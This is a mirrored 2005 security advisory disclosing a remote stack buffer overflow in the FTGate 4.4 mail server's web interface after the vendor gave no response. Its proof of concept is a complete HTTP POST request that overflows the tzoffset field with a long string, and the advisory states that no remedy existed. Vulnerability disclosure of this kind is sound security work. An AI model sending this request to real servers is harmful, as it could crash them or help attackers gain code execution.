|
|
|
>>
VUPEN Security / Public Mailing Lists Mirror |
Assigned : VUPEN/ADV-2005-3010
From : Security Advisories <Security-Advisories at acs-inc.com>
Subject : [ACSSEC-2005-11-25-0x4] FTGate 4.4 [Build 4.4.000 Oct 26 2005] St ack Buffer Overflow
Date : 2005-12-20
Original Message
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Stack Buffer Overflow
ID: ACSSEC-2005-11-25 - 0x4
Class: Stack based Buffer Overflow
Package: FTGate 4.4 [Build 4.4.000 Oct 26 2005]
Build: Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 20, 2005
Remote: Yes
Severity: Low
Credit: Tim Shelton <security-advisories_at_acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
-=[ Background
FTGate4 is a powerful Windows(TM) communication suite that combines
exceptional mail handling facilities with comprehensive Groupware
functionality. Its security and collaboration features were developed
in conjunction with leading ISP's and define a new era in mail server
performance.
-=[ Technical Description
FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to buffer overflow
via a specially crafted POST request. A remote attacker could issue the
vulnerable command followed by a malicious code to execute arbitrary
code.
-=[ Proof of Concepts
POST /index.fts HTTP/1.1
Host: 127.0.0.1:8089
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; redsand)
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=
0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: SessId=9b5cdbb1c3e1a06da4bf0789b25fe38a; modified=null;
webadmin.remember=null; webadmin.username=null
Referer: http://127.0.0.1:8089/
Content-Type: application/x-www-form-urlencoded
Content-Length: 346
config=1¶m1=&href=&tzoffset=11111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111&admin=administr
ator%40example.com&password=test12345
An overflow can be found at the variable tzoffset=[OVERFLOW]
-=[ Solution
No remedy available as of December 2005.
-=[ Credits
Vulnerability originally reported by Tim Shelton
-=[ ChangeLog
2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : No response from vendor, disclosing full information.
Disclaimer : VUPEN Security does not endorse the content of this
message submitted by others to public mailinglists. Messages submitted to public
mailinglists do not necessarily reflect the opinions or policies of VUPEN Security.
VUPEN Security makes no warranties, express or implied, as to the content of the message
in this page or the accuracy and reliability of any messages and other materials
submitted to public mailinglists. Any questions or comments regarding this page
should be sent to
team@vupen.com
|
|
|
|
|
|
Monthly Statistics |
 |
|
|
|
| |
|
Try VUPEN
VNS |
 |
|
 |
|
| |
|
 |
| |
|
|
|
|
